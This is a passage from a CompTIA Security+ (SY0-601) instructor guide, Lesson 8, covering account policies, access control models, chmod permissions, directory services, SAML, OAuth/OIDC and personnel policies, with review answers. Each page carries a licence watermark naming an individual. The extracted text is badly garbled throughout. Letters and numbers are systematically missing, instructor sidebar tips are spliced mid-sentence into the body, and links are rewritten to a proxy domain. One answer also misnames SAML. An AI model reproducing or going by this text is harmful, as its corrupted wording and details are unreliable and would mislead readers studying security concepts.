LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 190 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

7. For what type of account would interactive logon be disabled?

Interactive logon refers to starting a shell. ervice accounts do not re uire this type
of access. Default superuser accounts, such as Administrator and root, may also be
disabled, or limited to use in system recovery or repair.

8. hat t pe o files most need to e audited to per orm third part credential
management?

and A I keys are often unsecurely embedded in computer code or uploaded

mistakenly to repositories alongside code. Also, managing shared credentials can be
difficult, and many sites resort to storing them in a shared spreadsheet.

Lesson 8: Implementing Identity and Account Management Controls | Topic 8A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 191

Topic 8B
Implement Account Policies

EXAM OBJECTIVES COVERED Teaching

3.7 Given a scenario, implement identity and account management controls Tip
This topic covers
technical controls for
account management,
Account policies enforce the privilege management policy by setting what users can
such as system-
and cannot do. This helps you to enforce strong credential policies and to detect and enforced policies and
manage risks from compromised accounts. Auditing and permission reviews can reveal auditing tools.
suspicious behavior and attempts to break through security.

Account Attributes and Access Policies Show Slide(s)

As well as authenticating the user, an account can be configured with attributes as Account Attributes and
a user profile. Account ob ects can also be used to assign permissions and access Access Policies
policies.

Account Attributes
A user account is defined by a uni ue securit identifier I , a name, and a
credential. ach account is associated with a profile. The profile can be defined with
custom identity attributes describing the user, such as a full name, email address,
contact number, department, and so on. The profile may support media, such as an
account picture.
As well as attributes, the profile will usually provide a location for storing user
generated data files a home folder . The profile can also store per account settings for
software applications.

Access olicies
ach account can be assigned permissions over files and other network resources
and access policies or privileges over the use and configuration of network hosts.
These permissions might be assigned directly to the account or inherited through
membership of a security group or role. Access policies determine things like the right
to log on to a computer locally or via remote desktop, install software, change the
network configuration, and so on.
n a indows Active Directory network, access policies can be configured via group
policy objects (GPOs). s can be used to configure access rights for user group
role accounts. s can be linked to network administrative boundaries in Active
Directory, such as sites, domains, and rgani ational nits .

Lesson 8: Implementing Identity and Account Management Controls | Topic 8B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 192 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Configuring access policies and rights using Group Policy Ob ects in indows Server 016.
(Screenshot used with permission from icrosoft.)

Show Slide(s) Account ass ord olic ettin s

Account assword
ystem enforced account policies can help to enforce credential management
olicy ettings principles by stipulating re uirements for user selected passwords

Teaching
• assword length enforces a minimum length for passwords. There may also be a
Tip
maximum length.
Students should • assword comple ity enforces password comple ity rules that is, no use of
appreciate that the username within password and combination of at least eight upper lower case
syllabus regards
complexity and
alpha numeric and non alpha numeric characters .
aging as appropriate
policies, but make
• assword aging forces the user to select a new password after a set number of
them aware of days.
the updated NI T
guidance. • assword reuse and history prevents the selection of a password that has been
used already. The history attribute sets how many previous passwords are blocked.

In this conte t, you should note that the most recent guidance issued by NI T nvlpubs.
nist.gov nistpubs pecial ublications NI T. . b.pdf deprecates some of the
traditional elements of password policy
• Comple ity rules should not be enforced. The user should be allowed to choose
a password or other memori ed secret of between and A CII or NIC D
characters, including spaces. The only restriction should be to block common
passwords, such as dictionary words, repetitive strings like , strings
found in breach databases, and strings that repeat conte tual information, such as
username or company name.

• Aging policies should not be enforced. sers should be able to select if and when
a password should be changed, though the system should be able to force a
password change if compromise is detected.

• Password hints should not be used. A password hint allows account recovery by
submitting responses to personal information, such as first school or pet name.

Lesson 8: Implementing Identity and Account Management Controls | Topic 8B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 193

The cartoon at xkcd.com 6 sums up the effect of policies on password entropy.

One approach to a password hint is to treat it as a secondary password and submit a

random but memorable phrase, rather than an "honest" answer. The risk in allowing
password hints is demonstrated by the data recovered in the Adobe data breach
nakedsecurity.sophos.com anatomy of a password disaster adobes giant
sized-cryptographic-blunder .

Password reuse can also mean using a work password elsewhere (on a website, for
instance). This sort of behavior can only be policed by soft policies.

Account Restrictions Show Slide(s)

To make the task of compromising the user security system harder, account Account Restrictions
restrictions can be used.

Location-Based Policies
A user or device can have a logical network location, identified by an I address,
subnet, virtual LAN LAN , or organi ational unit . This can be used as an account
restriction mechanism. or e ample, a user account may be prevented from logging on
locally to servers within a restricted OU.
The geographical location of a user or device can also be calculated using a geolocation
mechanism. There are several types of geolocation:
• I address these can be associated with a map location to varying degrees of
accuracy based on information published by the registrant, including name, country,
region, and city. The registrant is usually the Internet service provider I , so the
information you receive will provide an appro imate location of a host based on the
I . If the I is one that serves a large or diverse geographical area, you will be less
likely to pinpoint the location of the host Internet service providers I s . oftware
libraries, such as eoI maxmind.com/en/geoip-demo , facilitate uerying this data.

• Location ervices these are methods used by the to calculate the device's
geographical position. A device with a global positioning system sensor
can report a highly accurate location when outdoors. Location services can also
triangulate to cell towers, i i hotspots, and luetooth signals where is not
supported.

Geofencing refers to accepting or re ecting access re uests based on location.

eofencing can also be used for push notification to send alerts or advice to a device
when a user enters a specific area. eotagging refers to the addition of location
metadata to files or devices. This is often used for asset management to ensure devices
are kept with the proper location.

Time-Based Restrictions
There are three main types of time based policies
• A time of day policy establishes authori ed logon hours for an account.

• A time based login policy establishes the ma imum amount of time an account may
be logged in for.

Lesson 8: Implementing Identity and Account Management Controls | Topic 8B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 194 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

• An impossible travel time risky login policy tracks the location of login events over
time. If these do not meet a threshold, the account will be disabled. or e ample, a
user logs in to an account from a device in New ork. A couple of hours later, a login
attempt is made from LA, but this is refused and an alert raised because it is not
feasible for the user to be in both locations.

Show Slide(s) Account Audits

Account Audits
Accounting and auditing processes are used to detect whether an account has been
compromised or is being misused. A security or audit log can be used to facilitate
Teaching detection of account misuse
Tip
• Accounting for all actions that have been performed by users. Change and version
Students should control systems depend on knowing when a file has been modified and by whom.
be aware of risks
from unmanaged
Accounting also provides for non repudiation that is, a user cannot deny that
accounts that have they accessed or made a change to a file . The main problems are that auditing
been created and successful access attempts can uickly consume a lot of disk space, and analy ing
forgotten about and the logs can be very time-consuming.
authorization creep.
• Detecting intrusions or attempted intrusions. ere records of failure type events
are likely to be more useful, though success type events can also be revealing if they
show unusual access patterns.

ecording an unsuccessful attempt to take ownership of an audited folder.

(Screenshot used with permission from icrosoft.)

Account auditing also refers to more general change control. ou need to take account
of changes to resources and users. esources may be updated, archived, or have their
clearance level changed. sers may leave, arrive, or change obs roles . or e ample,
if a user has moved to a new ob, old privileges may need to be revoked and new ones
granted. This process is referred to as recertification. Managing these sorts of changes
efficiently and securely re uires e ective standard operating procedures s and
clear and timely communication between departments between IT and , for instance .

Lesson 8: Implementing Identity and Account Management Controls | Topic 8B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 195

Account Permissions Show Slide(s)

here many users, groups, roles, and resources are involved, managing account Account ermissions
permissions is comple and time consuming. Improperly configured accounts can
have two di erent types of impact. n the one hand, setting privileges that are too
restrictive creates a large volume of support calls and reduces productivity. n the
other hand, granting too many privileges to users weakens the security of the system
and increases the risk of things like malware infection and data breach.

The phrase "authorization creep" refers to an employee who gains more and more access
privileges the longer they remain with the organization.

A user may be granted elevated privileges temporarily escalation . In this case, some
system needs to be in place to ensure that the privileges are revoked at the end of the
agreed period.
A system of auditing needs to be put in place so that privileges are reviewed regularly.
Auditing would include monitoring group membership and reviewing access control
lists for each resource plus identifying and disabling unnecessary accounts.

etermining effective permissions for a shared folder.

(Screenshot used with permission from icrosoft.)

sa e Audits Show Slide(s)

sage auditing means configuring the security log to record key indicators and then Account Permissions
reviewing the logs for suspicious activity. Determining what to log is one of the most sage Audits
considerable challenges a network administrator can face. or Active Directory,
Microsoft has published audit policy recommendations for baseline re uirements and
networks with stronger security re uirements docs.microsoft.com en us windows
server/identity/ad-ds/plan/security-best-practices/audit-policy-recommendations .

Lesson 8: Implementing Identity and Account Management Controls | Topic 8B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 196 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Some typical categories include:

• Account logon and management events.

• Process creation.

• b ect access file system file shares .

• Changes to audit policy.

• Changes to system security and integrity anti virus, host firewall, and so on .

Configuring audit entries for a folder in indows. (Screenshot used with permission from icrosoft.)

Show Slide(s) Account oc out and isa lement

Account Lockout and
If account misuse is detected or suspected, the account can be manually disabled
Disablement by setting an account property. This prevents the account from being used for login.
Note that disabling the account does not close e isting sessions. ou can issue a
remote logo command to close a session. Account disablement means that login is
permanently prevented until an administrator manually re-enables the account.

Lesson 8: Implementing Identity and Account Management Controls | Topic 8B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 197

Setting a property to disable an account. (Screenshot used with permission from icrosoft.)

An account lockout means that login is prevented for a period. This might be
done manually if a policy violation is detected, but there are several scenarios for
automatically applying a lockout:
• An incorrect account password is entered repeatedly.

• The account is set to expire. Setting an account expiration date means that an
account cannot be used beyond a certain date. This option is useful on accounts for
temporary and contract sta .

• hen using time or location based restrictions, the server periodically checks
whether the user has the right to continue using the network. If the user does not
have the right, then an automatic logout procedure commences.

Configuring an account lockout policy. (Screenshot used with permission from icrosoft.)

Lesson 8: Implementing Identity and Account Management Controls | Topic 8B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 198 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Review Activity:
Account Policies
Answer the following uestions

1. hat container ould ou use i ou ant to appl a di erent securit

policy to a subset of objects within the same domain?

rgani ation nit .

2. Why might forcing users to change their password every month be

counterproductive?

More users would forget their password, try to select unsecure ones, or write them
down record them in a non secure way like a sticky note .

3. What is the name of the policy that prevents users from choosing old
passwords again?

nforce password history.

4. In what two ways can an IP address be used for context-based

authentication?

An I address can represent a logical location subnet on a private network. Most types
of public I address can be linked to a geographical location, based on information
published by the registrant that manages that block of i address space.

5. How does accounting provide non-repudiation?

A user's actions are logged on the system. ach user is associated with a uni ue
computer account. As long as the user's authentication is secure and the logging
system is tamper proof, they cannot deny having performed the action.

6. Which information resource is required to complete usage auditing?

sage events must be recorded in a log. Choosing which events to log will be guided by
an audit policy.

7. hat is the di erence et een loc ed and disa led accounts

An account enters a locked state because of a policy violation, such as an incorrect

password being entered incorrectly. Lockout is usually applied for a limited duration.
An account is usually disabled manually, using the account properties. A disabled
account can only be re-enabled manually.

Lesson 8: Implementing Identity and Account Management Controls | Topic 8B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 199

Topic 8C
Implement Authorization Solutions

EXAM OBJECTIVES COVERED Teaching

. Summarize authentication and authorization design concepts Tip
3.8 Given a scenario, implement authentication and authorization solutions This topic focuses
.1 Given a scenario, use the appropriate tool to assess organizational security (chmod only) on access control
schemes, such as DAC
Implementing an e ective authori ation solution system re uires understanding of the versus MAC. e also
di erent models that such systems can be based on. hile an on premises network look at authorization
protocols in the
can use a local directory to manage accounts and rights, as organizations move conte t of federated
services to the cloud, these authori ations have to be implemented using federated identity management.
identity management solutions. This topic is quite
complex, so be
prepared to allocate
Discretionary and Role-Based Access Control plenty of time to
presenting it.
An important consideration in designing a security system is to determine how users
receive rights or permissions. The di erent models are referred to as access control Show Slide(s)
schemes.
Discretionary and
Discretionary Access Control (DAC) Role-Based Access
Control
Discretionary access control (DAC) is based on the primacy of the resource owner.
The owner is originally the creator of a file or service, though ownership can be Teaching
assigned to another user. The owner is granted full control over the resource, meaning Tip
that he or she can modify its access control list ACL to grant rights to others. Real world
DAC is the most e ible model and is currently implemented widely in terms of implementations of
access control do not
computer and network security. In terms of file system security, it is the model used e actly conform to
by default for most NI Linu distributions and by Microsoft indows. As the most these models. Discuss
e ible model, it is also the weakest because it makes centrali ed administration of some examples and
security policies the most difficult to enforce. It is also the easiest to compromise, as it ask students how
is vulnerable to insider threats and abuse of compromised accounts. they would categorize
them. Emphasize the
di erence between
Role-Based Access Control (RBAC) discretionary and non-
discretionary/rule-
Role-based access control (RBAC) adds an e tra degree of centrali ed control to
based access control.
the DAC model. nder AC, a set of organi ational roles are defined, and sub ects
The key di erence
allocated to those roles. nder this system, the right to modify roles is reserved to a is where decision-
system owner. Therefore, the system is non discretionary, as each sub ect account has making lies. ith
no right to modify the ACL of a resource, even though they may be able to change the DAC, it lies with the
resource in other ways. sers are said to gain rights implicitly through being assigned resource owner. In
to a role rather than e plicitly being assigned the right directly . AC and MAC, it lies
with the system owner
AC can be partially implemented through the use of security group accounts, but that is, the controls
they are not identical schemes. Membership of security groups is largely discretionary are enforced system
assigned by administrators, rather than determined by the system . Also, ideally, a wide and cannot be
countermanded or
sub ect should only inherit the permissions of a role to complete a particular task excepted by users
rather than retain them permanently. within the system .

Lesson 8: Implementing Identity and Account Management Controls | Topic 8C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 200 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Show Slide(s) ile stem ermissions

ile ystem
An access control model can be applied to any type of data or software resource
ermissions but is most closely associated with network, file system, and database security. ith
file system security, each ob ect in the file system has an ACL associated with it. The
Teaching ACL contains a list of accounts principals allowed to access the resource and the
Tip permissions they have over it. ach record in the ACL is called an access control entry
oth indows and AC . The order of AC s in the ACL is important in determining e ective permissions
Linu file permissions for a given account. ACLs can be enforced by a file system that supports permissions,
are covered at A such as NT , e t e t , or .
level, so will hopefully
be familiar to the
students. chmod is
called out as a content
example, so we cover
it in a bit more detail
than indows ACLs.

Configuring an access control entry for a folder. (Screenshot used with permission from icrosoft.)

or e ample, in Linu , there are three basic permissions

• ead r the ability to access and view the contents of a file or list the contents of a
directory.
• rite w the ability to save changes to a file, or create, rename, and delete files in
a directory also re uires e ecute .
• ecute x the ability to run a script, program, or other software file, or the ability
to access a directory, e ecute a file from that directory, or perform a task on that
directory, such as file search.
These permissions can be applied in the conte t of the owner user u , a group account
g , and all other users world o . A permission string lists the permissions granted in
each of these conte ts
d rwx r-x r-x home
The string above shows that for the directory d , the owner has read, write, and e ecute
permissions, while the group context and other users have read and execute permissions.
The chmod command is used to modify permissions. It can be used in symbolic mode
or absolute mode. In symbolic mode, the command works as follows
chmod g+w, o-x home

Lesson 8: Implementing Identity and Account Management Controls | Topic 8C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 201

The e ect of this command is to append write permission to the group conte t and
remove e ecute permission from the other conte t. y contrast, the command can also
be used to replace e isting permissions. or e ample, the following command applies
the configuration shown in the first permission string
chmod u=rwx,g=rx,o=rx home
In absolute mode, permissions are assigned using octal notation, where r ,w , and
. or e ample, the following command has the same e ect
chmod 755 home

Mandatory and Attribute-Based Access Control Show Slide(s)

The DAC and AC models e pose privileged accounts to the threat of compromise. Mandatory and
More restrictive access control models can be used to mitigate this threat. Attribute-Based Access
Control
Mandatory Access Control (MAC)
Mandatory access control (MAC) is based on the idea of security clearance levels.
ather than defining ACLs on resources, each ob ect and each sub ect is granted a
clearance level, referred to as a label. If the model used is a hierarchical one that is,
high clearance users are trusted to access low clearance ob ects , sub ects are only
permitted to access objects at their own clearance level or below.
The labelling of ob ects and sub ects takes place using pre established rules. The critical
point is that these rules cannot be changed by any sub ect account, and are therefore
non discretionary. Also, a sub ect is not permitted to change an ob ect's label or to
change his or her own label.

Attribute-Based Access Control (ABAC)

Attribute-based access control (ABAC) is the most fine grained type of access control
model. As the name suggests, an A AC system is capable of making access decisions
based on a combination of sub ect and ob ect attributes plus any conte t sensitive or
system-wide attributes. As well as group/role memberships, these attributes could
include information about the currently being used, the I address, or the presence
of up to date patches and anti malware. An attribute based system could monitor
the number of events or alerts associated with a user account or with a resource, or
track access re uests to ensure they are consistent in terms of timing of re uests or
geographic location. It could be programmed to implement policies, such as M of N
control and separation of duties.

Rule-Based Access Control Show Slide(s)

Rule-based access control is a term that can refer to any sort of access control model Rule-Based Access
where access control policies are determined by system enforced rules rather than Control
system users. As such, AC, A AC, and MAC are all e amples of rule based or non
discretionary access control. As well as the formal models, rule based access control Teaching
principles are increasingly being implemented to protect computer and network Tip
systems founded on discretionary access from the sort of misconfiguration that can Rule-based access
occur through DAC. control is also not
necessarily dependent
Conditional Access on the identity of the
user a firewall ACL,
Conditional access is an e ample of rule based access control. A conditional access for instance .
system monitors account or device behavior throughout a session. If certain
conditions are met, the account may be suspended or the user may be required to
re authenticate, perhaps using a step verification method. The ser Account Control

Lesson 8: Implementing Identity and Account Management Controls | Topic 8C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 202 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

AC and sudo restrictions on privileged accounts are e amples of conditional access.

The user is prompted for confirmation or authentication when re uests that re uire
elevated privileges are made. ole based rights management and A AC systems can
apply a number of criteria to conditional access, including location based policies
docs.microsoft.com en us a ure active directory conditional access overview .

Privileged Access Management

A privileged account is one that can make significant configuration changes to a host,
such as installing software or disabling a firewall or other security system. rivileged
accounts also have rights to log on network appliances and application servers.
Privileged access management (PAM) refers to policies, procedures, and technical
controls to prevent the malicious abuse of privileged accounts and to mitigate risks
from weak configuration control over privileges. These controls identify and document
privileged accounts, giving visibility into their use, and manage the credentials used to
access them beyondtrust.com/resources/glossary/privileged-access-management-pam .

Show Slide(s) Directory Services

Directory Services
Directory services are the principal means of providing privilege management and
authori ation on an enterprise network, storing information about users, computers,
Teaching security groups/roles, and services. A directory is like a database, where an object is
Tip like a record, and things that you know about the ob ect attributes are like fields. In
Directory services order for products from di erent vendors to be interoperable, most directories are
are critical to the based on the same standard. The Lightweight Directory Access rotocol LDA is a
functioning of most protocol widely used to uery and update . format directories.
enterprise networks.
They are also used A distinguished name DN is a uni ue identifier for any given resource within an . like
over the Internet IM directory. A distinguished name is made up of attribute value pairs, separated by commas.
user directories, for The most specific attribute is listed first, and successive attributes become progressively
instance . The main
broader. This most specific attribute is also referred to as the relative distinguished name,
concerns are with
the confidentiality of as it uni uely identifies the ob ect within the conte t of successive parent attribute values.
the information read
access , integrity of
the information write
access , and Do
preventing network
access by knocking out
the directory server .
Note that the
common name CN
attribute of an .
digital certificate is
commonly configured
as the DN. In an
. directory, CN
is a single host or
username label. The
distinguished name is
specified through the
hierarchy of attributes.

rowsing ob ects in an Active irectory AP schema. (Screenshot used with permission from icrosoft.)

The types of attributes, what information they contain, and the way ob ect types are
defined through attributes some of which may be re uired, and some optional is
described by the directory schema. ome of the attributes commonly used include
common name CN , organi ational unit , organi ation , country C , and domain

Lesson 8: Implementing Identity and Account Management Controls | Topic 8C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 203

component DC . or e ample, the distinguished name of a web server operated by

idget in the might be
CN=WIDGETWEB, OU=Marketing, O=Widget, C=UK,
DC=widget, DC=foo

ederation and Attestation Show Slide(s)

An on premises network can use technologies such as LDA and eberos, very often ederation and
implemented as a indows Active Directory network, because the administration Attestation
of accounts and devices can be centrali ed. panding this type of network to share
resources with business partners or use services in public clouds means implementing Teaching
some type of federation technology. Tip
Make sure that
Federation students understand
the concepts of
Federation is the notion that a network needs to be accessible to more than just a federation and trusts
well defined group of employees. In business, a company might need to make parts of and that AML is a
its network open to partners, suppliers, and customers. The company can manage its means of e changing
authorizations in a
employee accounts easily enough. Managing accounts for each supplier or customer federated network.
internally may be more difficult. ederation means that the company trusts accounts
created and managed by a di erent network. As another e ample, in the consumer
world, a user might want to use both oogle Apps and Twitter. If oogle and Twitter
establish a federated network for the purpose of authentication and authori ation,
then the user can log on to Twitter using his or her oogle credentials or vice versa.

Identity Providers and Attestation

In these models, the networks perform federated identity management. A user from
one network is able to provide attestation that proves their identity. In very general
terms, the process is similar to that of erberos authori ation, and works as follows
1. The user principal attempts to access a service provider , or the relying party
. The service provider redirects the principal to the identity provider (IdP) to
authenticate.

2. The principal authenticates with the identity provider and obtains an attestation
of identity, in the form of some sort of token or document signed by the Id .

3. The principal presents the attestation to the service provider. The SP can validate
that the Id has signed the attestation because of its trust relationship with
the Id .

4. The service provider can now connect the authenticated principal to its own
accounts database. It may be able to uery attributes of the user account profile
held by the Id , if the principal has authori ed this type of access.

Lesson 8: Implementing Identity and Account Management Controls | Topic 8C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 204 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

ederated identity management overview. (Images 1 .com.)

Cloud ersus n remises e uirements

here a company needs to make use of cloud services or share resources with
Show Slide(s) business partner networks, authentication and authorization design comes with
more constraints and additional re uirements. eb applications might not support
erberos, while third party networks might not support direct federation with Active
Security Assertions
Markup Language Directory LDA . The design for these cloud networks is likely to re uire the use of
standards for performing federation and attestation between web applications.
Teaching
Tip ecurit Assertions ar up an ua e
hile AML is
complex, make sure A federated network or cloud needs specific protocols and technologies to implement
students understand user identity assertions and transmit attestations between the principal, the relying
that it allows services party, and the identity provider. Security Assertions Markup Language (SAML) is
to be separated from
identity providers
one such solution. AML attestations or authori ations are written in e tensible
and not have to Markup Language ML . Communications are established using TT TT and the
authenticate users Simple Object Access Protocol (SOAP). These secure tokens are signed using the ML
directly. The service signature specification. The use of a digital signature allows the relying party to trust
provider does not the identity provider.
authenticate the user
it obtains an assertion As an e ample of a AML implementation, Ama on eb ervices A can function
from the identity as a AML service provider. This allows companies using A to develop cloud
provider that it has applications to manage their customers' user identities and provide them with
authenticated the
user.
permissions on A without having to create accounts for them on A directly.
Students should also <samlp:Response
be recognize the xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
general format of
AML attestations xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion"
assertions. ID="200" Version="2.0"

Lesson 8: Implementing Identity and Account Management Controls | Topic 8C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 205

IssueInstant="2020-01-01T20:00:10Z "
Destination="https://sp.foo/saml/acs"
InResponseTo="100".
<saml:Issuer>https://idp.foo/sso</saml:Issuer>
<ds:Signature>...</ds:Signature>
<samlp:Status>...(success)...</samlp:Status.
<saml:Assertion xmlns:xsi="http://www.w3.org/2001/
XMLSchema-instance"
xmlns:xs="http://www.w3.org/2001/XMLSchema" ID="2000"
Version="2.0"
IssueInstant="2020-01-01T20:00:09Z">
<saml:Issuer>https://idp.foo/sso</saml:Issuer>
<ds:Signature>...</ds:Signature>
<saml:Subject>...
<saml:Conditions>...
<saml:AudienceRestriction>...
<saml:AuthnStatement>...
<saml:AttributeStatement>
<saml:Attribute>...
<saml:Attribute>...
</saml:AttributeStatement>
</saml:Assertion>
</samlp:Response> Show Slide(s)

OAuth and OpenID

OAuth and OpenID Connect Connect
Many public clouds use application programming interfaces A Is based on Teaching
epresentational tate Transfer T rather than A . These are often called Tip
Tful A Is. here A is a tightly specified protocol, T is a looser architectural
Stress that an OAuth
framework. This allows the service provider more choice over implementation client is not the user.
elements. Compared to A and AML, there is better support for mobile apps. It is a website or
mobile app interacting
OAuth with an OAuth IdP or
resource server.
Authentication and authori ation for a Tful A I is often implemented using the There are two
pen Authori ation Auth protocol. Auth is designed to facilitate sharing versions of Auth.
of information resources within a user profile between sites. The user creates a Also, OpenID is
password protected account at an identity provider Id . The user can use that a separate, older
account to log on to an OAuth consumer site without giving the password to the protocol to IDC.
Detailed knowledge of
consumer site. A user resource owner can grant a client an authori ation to access older versions should
some part of their account. A client in this conte t is an app or consumer site. not be re uired for
the exam, but you
The user account is hosted by one or more resource servers. A resource server is
might want to make
also called an A I server because it hosts the functions that allow clients consumer students aware of
sites and mobile apps to access user attributes. Authori ation re uests are processed them developer.okta.
by an authorization server. A single authorization server can manage multiple com/blog/2019/10/21/
resource servers e ually the resource and authori ation server could be the same illustrated-guide-to-
server instance. oauth-and-oidc .

Lesson 8: Implementing Identity and Account Management Controls | Topic 8C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 206 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

The client app or service must be registered with the authori ation server. As part of
this process, the client registers a redirect URL, which is the endpoint that will process
authorization tokens. Registration also provides the client with an ID and a secret.
The ID can be publicly e posed, but the secret must be kept confidential between the
client and the authori ation server. hen the client application re uests authori ation,
the user approves the authorization server to grant the request using an appropriate
method. Auth supports several grant types or ows for use in di erent conte ts,
such as server to server or mobile app to server. Depending on the ow type, the
client will end up with an access token validated by the authorization server. The client
presents the access token to the resource server, which then accepts the re uest for
the resource if the token is valid.
Auth uses the Java cript ob ect notation J N web token J T format for claims
data. J Ts can easily be passed as ase encoded strings in Ls and TT headers
and can be digitally signed for authentication and integrity.

OpenID Connect (OIDC)

OAuth is explicitly designed to authorize claims and not to authenticate users. The
implementation details for fields and attributes within tokens are not defined. There
is no mechanism to validate that a user who initiated an authorization request is
still logged on and present. The access token once granted has no authenticating
information. Open ID Connect (OIDC) is an authentication protocol that can be
implemented as special types of Auth ows with precisely defined token fields.

ote that OpenI can also refer to an earlier protocol developed between 00 and 00 .
This implemented a similar framework and underpinned early "sign on with" functionality,
but is now regarded as obsolete. OpenI uses -format messaging and supports only
web applications and not mobile apps.

Lesson 8: Implementing Identity and Account Management Controls | Topic 8C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 207

Review Activity:
Authorization Solutions
Answer the following uestions

1. hat are the ad anta es o a decentrali ed discretionar access control

policy over a mandatory access control policy?

It is easier for users to ad ust the policy to fit changing business needs. Centrali ed
policies can easily become in e ible and bureaucratic.

2. hat is the di erence et een securit roup and role ased permissions
management?

A group is simply a container for several user ob ects. Any organi ing principle can be
applied. In a role based access control system, groups are tightly defined according to
ob functions. Also, a user should logically only possess the permissions of one role at
a time.

3. In a rule-based access control model, can a subject negotiate with the data
owner for access privileges? Why or why not?

This sort of negotiation would not be permitted under rule based access control it is a
feature of discretionary access control.

4. What is the purpose of directory services?

To store information about network resources and users in a format that can be
accessed and updated using standard queries.

5. True or false? The following string is an example of a distinguished name:

CN=ad, DC=classroom,DC=com

True.

6. You are working on a cloud application that allows users to log on with
social media accounts over the web and from a mobile application. Which
protocols would you consider and which would you choose as most
suitable?

ecurity Association Markup Language AML and auth penID Connect IDC .
Auth with IDC as an authentication layer o ers better support for native mobile
apps so is probably the best choice.

Lesson 8: Implementing Identity and Account Management Controls | Topic 8C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 208 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Topic 8D
Explain the Importance
o ersonnel olicies

Teaching EXAM OBJECTIVES COVERED

Tip 5.3 Explain the importance of policies to organizational security
hile students
should understand
the uses and reasons
As well as implementing technical controls for identity and account management, you
for applying these
policies, these content will need to make sure that your personnel follow appropriate security procedures and
examples are quite policies. The human element can represent a significant attack surface, especially when
straightforward. Try social engineering attacks are involved. As a security professional, you will work with
not to spend too a human resources department to assist with the formulation of policies and the
long on this topic, or development and delivery of security awareness and training programs.
designate it for self
study.

Show Slide(s)
Conduct olicies
Operational policies include privilege/credential management, data handling, and
Conduct olicies incident response. Other important security policies include those governing employee
conduct and respect for privacy.

Accepta le se olic
nforcing an acceptable use policy (AUP) is important to protect the organization
from the security and legal implications of employees misusing its e uipment.
Typically, the policy will forbid the use of e uipment to defraud, defame, or to obtain
illegal material. It will prohibit the installation of unauthori ed hardware or software
and e plicitly forbid actual or attempted snooping of confidential data that the
employee is not authorized to access. Acceptable use guidelines must be reasonable
and not interfere with employees' fundamental ob duties or privacy rights. An
organi ation's A may forbid use of Internet tools outside of work related duties or
restrict such use to break times.

Code o Conduct and ocial edia Anal sis

A code of conduct, or rules of behavior, sets out e pected professional standards.
or e ample, employees' use of social media and file sharing poses substantial risks
to the organi ation, including threat of virus infection or systems intrusion, lost work
time, copyright infringement, and defamation. sers should be aware that any data
communications, such as email, made through an organi ation's computer system
are likely stored within the system, on servers, backup devices, and so on. Such
communications are also likely to be logged and monitored. Employers may also
sub ect employees' personal social media accounts to analysis and monitoring, to
check for policy infringements.
ules of behavior are also important when considering employees with privileged
access to computer systems. Technicians and managers should be bound by clauses
that forbid them from misusing privileges to snoop on other employees or to disable a
security mechanism.

Lesson 8: Implementing Identity and Account Management Controls | Topic 8D

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 209

Use of Personally Owned Devices in the Workplace

Portable devices, such as smartphones, USB sticks, media players, and so on, pose
a considerable threat to data security, as they make file copy so easy. Camera and
voice recording functions are other obvious security issues. Network access control,
endpoint management, and data loss prevention solutions can be of some use in
preventing the attachment of such devices to corporate networks. ome companies
may try to prevent sta from bringing such devices on site. This is uite difficult to
enforce, though.
Also important to consider is the unauthori ed use of personal software by employees
or employees using software or services that has not been sanctioned for a pro ect
shadow IT . ersonal software may include either locally installed software or
hosted applications, such as personal email or instant messenger, and may leave the
